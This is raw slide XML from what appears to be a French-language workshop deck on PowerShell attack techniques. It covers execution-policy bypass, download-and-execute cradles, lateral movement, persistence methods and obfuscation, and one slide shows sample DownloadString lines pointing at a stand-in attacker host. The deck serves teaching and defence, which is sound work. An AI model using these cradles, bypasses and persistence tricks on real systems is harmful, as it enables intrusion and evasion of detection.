            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Tâches</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>planifiées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
 Dossier de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>démarrage</a:t>
          </a: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WMI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GPOs
 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Profils</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>locaux</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2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0" y="2209064"/>
        <a:ext cx="6169344" cy="2893140"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5102205"/>
          <a:ext cx="61753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102205"/>
          <a:ext cx="6175375" cy="1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102205"/>
        <a:ext cx="6175375" cy="147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241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a)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pipe le script dans le standard-in de powershell.exe, comme avec la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> ou type.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b)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisez l'argument command pour exécuter une seule commande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c) Utilisez l'argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour exécuter une seule commande en Base64.  Cela exclura la commande de la politique d'exécution. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>d)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Utilisez la directive de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> et passez soit "bypass" soit "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>unrestricted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>" comme argument.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a+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> La classe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>System.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>envoyer des données vers des ressources distantes ou en recevoir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> la méthode API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, qui télécharge le contenu d'un emplacement distant vers un fichier local, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>la méthode API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, qui télécharge le contenu d'un emplacement distant vers un tampon en mémoire. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>C+d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-Expression et Start-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> -  lancer un nouveau processus. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-Expression permet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d'évaluer et d'exécuter toute commande générée dynamiquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (scripts qui sont téléchargés directement en mémoire ). Egalement utilisés </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Invoke-WMIMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> et New-Service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>PS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>utilisé aussi pour charger et exécuter n'importe quel fichier PE directement depuis la mémoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>éutilisation du</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>ReflectivePEInjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>).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fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – exécuter des scripts à distance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Enter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> -  entrer dans une session PowerShell distante interactive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>WMI - présente sur la plupart des ordinateurs Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Profile Injection - si l'attaquant a accès en écriture à tout fichier de profil PowerShell sur l'ordinateur distant, il peut y ajouter du code malveillant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Common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- D'autres tactiques incluent l'utilisation d'outils système </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>oepn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> source (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Sheduler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PsExec,Mimikatz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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Base des registres -  Les attaquants peuvent stocker l'ensemble du script dans le registre, ce qui rend l'infection sans fichier. Comme il n'y a pas de fichier script ordinaire sur le disque, la menace est difficile à détecter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keys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Scheduled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 -  Il est possible de créer une nouvelle tâche qui exécutera une commande PowerShell à des moments de déclenchement spécifiques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Dossier de démarrage -  Un petit fichier script placé dans le dossier Startup peut être utilisé pour la persistance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>WMI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Un attaquant peut créer un filtre pour tout événement spécifique et créer une méthode de consommation pour déclencher le script malveillant sur ces événements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>GPO -  Les GPO peuvent être utilisés pour ajouter un point de chargement pour un script PowerShell comme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Profils - :Les attaquants peuvent placer un code malveillant dans l'un des six profils PowerShell disponibles ou créer leur propre profil. Le code sera exécuté lorsque PowerShell démarrera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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ANALYSIS WORKSHOP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450" y="5999148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Horea Moldovan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POLITIQUES D’EXECUTION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85696083"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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3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POLITIQUES D’EXECUTION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5179586"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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33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EXECUTION DU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>SCrIPT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0791173"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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61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EXECUTION DU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Bodoni SvtyTwo ITC TT-Book"/>
              </a:rPr>
              <a:t>SCrIPT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83344357"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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1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VECTEURS D’ATTAQUE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8605" y="2461189"/>
            <a:ext cx="1051959" cy="106822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21023" y="3844636"/>
            <a:ext cx="1132396" cy="101324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28" y="1442312"/>
            <a:ext cx="1283727" cy="1283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89" y="3010971"/>
            <a:ext cx="1276166" cy="1276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28" y="4657222"/>
            <a:ext cx="1283727" cy="128372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4151006" y="3649054"/>
            <a:ext cx="1146183" cy="3275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3355" y="144231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email</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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5181" y="3281703"/>
            <a:ext cx="97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macros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73354" y="526254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exploits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779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LATERAL MOVEMENT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2456661"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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7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PERSISTENCE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791226"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5559424" y="397620"/>
          <a:ext cx="6175375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08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Obscurcissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>donnees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0138" y="1525044"/>
            <a:ext cx="745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Utiliser des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>opérations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour rendre les données </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>illisibles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251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454" y="2215309"/>
            <a:ext cx="120900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Mélange de lettres majuscules et minuscules :                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>neW-oBjEct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system.NeT.WeBclieNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dOWNloadfiLe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean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 Les chaînes de caractères peuvent être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>concaténées :           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”+’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://’+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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fr-FR" b="1" i="1" dirty="0" smtClean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Des espaces blancs peuvent être insérés :                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( $url) </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean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 Des guillemets simples ou doubles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>pour les arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:         ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean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 De nombreuses commandes ont des alias :                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GCM = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Les chaînes de caractères peuvent être remplacées par des chaînes codées (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, ASCI, octal) :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[char]58 =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“:” </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean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 M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>anipulations des chaînes de caractères :    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>((“http://myGoodSite.tld” </a:t>
            </a:r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                                                                     -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replace “Good” “attacker”)) </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean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 Les chaînes de caractères peuvent être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>compressées et encodées (Base64) ou cryptées (XOR).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0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OFFENSIVES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2435" y="3221111"/>
            <a:ext cx="251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;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92" y="1962379"/>
            <a:ext cx="114304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Powersploit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:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>collection de différents scripts PowerShell destinés aux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>pen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-testeurs.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Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
